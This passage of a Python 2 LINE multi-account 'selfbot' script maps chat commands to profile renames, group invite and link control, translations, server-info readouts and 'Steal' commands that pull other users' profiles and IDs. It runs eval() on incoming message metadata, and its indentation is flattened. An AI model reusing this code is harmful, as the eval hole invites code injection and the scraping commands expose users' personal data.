msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
cl.sendMessage(msg)
ks.sendMessage(msg)
kt.sendMessage(msg)
#=================================================
#==================================================
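# Profile commands: "All rename:" / "Allbio:" push one display name or
# status message to every bot account; the length guards mirror LINE's
# limits of 20 chars for names and 500 for status messages.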
elif "All rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("All rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Allbio:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kt.getProfile()
profile.statusMessage = string
kt.updateProfile(profile)
cl.sendText(msg.to,"successfully turn it into: " + string + "")
elif "Bot1 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot1 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot2 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot2 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot3 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot3 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot4 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot4 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot5 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot5 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot6 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot6 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
kt.sendText(msg.to,"change name: "+string+"\nsucces")
#==================================================
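# "lyric " and "music " query a third-party joox lookup API (ide.fdlrcn.com)
# and relay the title, duration, download link, or lyrics back to the chat.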
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Song Lyrics ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'bot restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Title : ' + song[0]
hasil += '\nDuration : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There are no pending invitations.")
else:
cl.sendText(msg.to,"No pending invitations")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Can only be used in a group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Can only be used in a group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#------------------------_--------------------------------------
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
elif msg.text in ["Creator"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg)
cl.sendText(msg.to,"Itu Creator Saya ")
elif "Admin on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"succes add to adminlist")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
elif msg.text.lower() == 'admin list':
if msg.from_ in admin:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"loading...")
mc = ""
gh = ""
for mi_d in owner:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
for mi_d in admin:
gh += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"=======OWNER=======\n\n" + mc + "\n=======ADMIN=======\n\n" + gh +"\n=====================\n")
print "[Command]Stafflist executed"
elif "Expel on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Expel on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Succes remove admin from adminlist")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
#==========================================================
elif 'bot mid' in msg.text.lower():
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
kt.sendText(msg.to,Emid)
#=======================================================
elif "Translate-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-jp" in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-jp ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja') # 'ja' is the language code Google expects for Japanese
cl.sendText(msg.to,trs)
print '[Command] Translate jp'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-th " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-th ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate th'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-idn " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
kt.sendText(msg.to,(bctxt))
#======================================
elif "TL:" in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#=================================================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Welcome message:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome message:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
else:
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
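# "Invite user" arms the winvite flag; the next contact message that arrives
# is handled by the contact-invite branch near the top of the dispatcher.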
elif msg.text in ["Invite user"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Mc:" in msg.text:
if msg.from_ in admin:
mmid = msg.text.replace("Mc:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#=======================================================
elif msg.text in ["Auto notice:on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
#=========================================================================
elif msg.text in ["Auto notice:off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
elif msg.text in ["Auto join:on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"")
else:
cl.sendText(msg.to,"already activated")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"enable auto koin")
else:
cl.sendText(msg.to,"")
elif msg.text in ["Auto join:off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#===============================================================
elif msg.text in ["Auto like:on"]:
if msg.from_ in admin:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Auto like:off"]:
if msg.from_ in admin:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
#==========================================================
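# "Settings" / "Set" prints a snapshot of every toggle held in the wait dict.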
elif msg.text in ["Settings","Set"]:
if msg.from_ in admin:
print "Setting pick up..."
md="list of bot settings\n\n"
if wait["likeOn"] == True: md+="Auto like : on\n"
else:md+="Auto like : off\n"
if wait["winvite"] == True: md+="Invite : on\n"
else:md+="Invite : off\n"
if wait["pname"] == True: md+="Namelock : on\n"
else:md+="Namelock : off\n"
if wait["contact"] == True: md+="Notice : on\n"
else: md+="Notice : off\n"
if wait["autoJoin"] == True: md+="Auto join : on\n"
else: md +="Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+="Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel : off\n"
if wait["leaveRoom"] == True: md+="Auto leave : on\n"
else: md+="Auto leave : off\n"
if wait["clock"] == True: md+="Clock Name : on\n"
else:md+="Clock Name : off\n"
if wait["autoAdd"] == True: md+="Auto add : on\n"
else:md+="Auto add : off\n"
if wait["commentOn"] == True: md+="Comment : on\n"
else:md+="Comment : off\n"
if wait["Backup"] == True: md+="Backup : on\n"
else:md+="Backup : off\n"
if wait["qr"] == True: md+="Protect QR : on\n"
else:md+="Protect QR : off\n"
if wait["welcomemsg"] == True: md+="welcome message : on\n"
else:md+="welcome message : off\n"
if wait["protectionOn"] == True: md+="Protection : hight\n\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="Protection : low\n\n"+ datetime.today().strftime('%H:%M:%S')
cl.sendText(msg.to,md)
#========================================
#------------------------------------------------
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["PING","Ping","ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs up Har Har")
kk.sendText(msg.to,"PONG double thumbs up Har Har")
kc.sendText(msg.to,"PONG double thumbs up Har Har")
ks.sendText(msg.to,"PONG double thumbs up Har Har")
kt.sendText(msg.to,"PONG double thumbs up Har Har")
cl.sendText(msg.to,"PONG double thumbs up Har Har")
elif "Info @" in msg.text:
if msg.from_ in admin:
nama = msg.text.replace("Info @","")
target = nama.rstrip(' ')
tob = cl.getGroup(msg.to)
for g in tob.members:
if target == g.displayName:
gjh= cl.getContact(g.mid)
try:
cover = cl.channel.getCover(g.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + gjh.displayName + "\n[Mid]:\n" + gjh.mid + "\n[BIO]:\n" + gjh.statusMessage + "\n[pict profile]:\nhttp://dl.profile.line-cdn.net/" + gjh.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
elif msg.text in ["Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
#========================================
#========================================
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif "Message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message:","")
cl.sendText(msg.to,"bot message\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Add message:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["Comment:on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
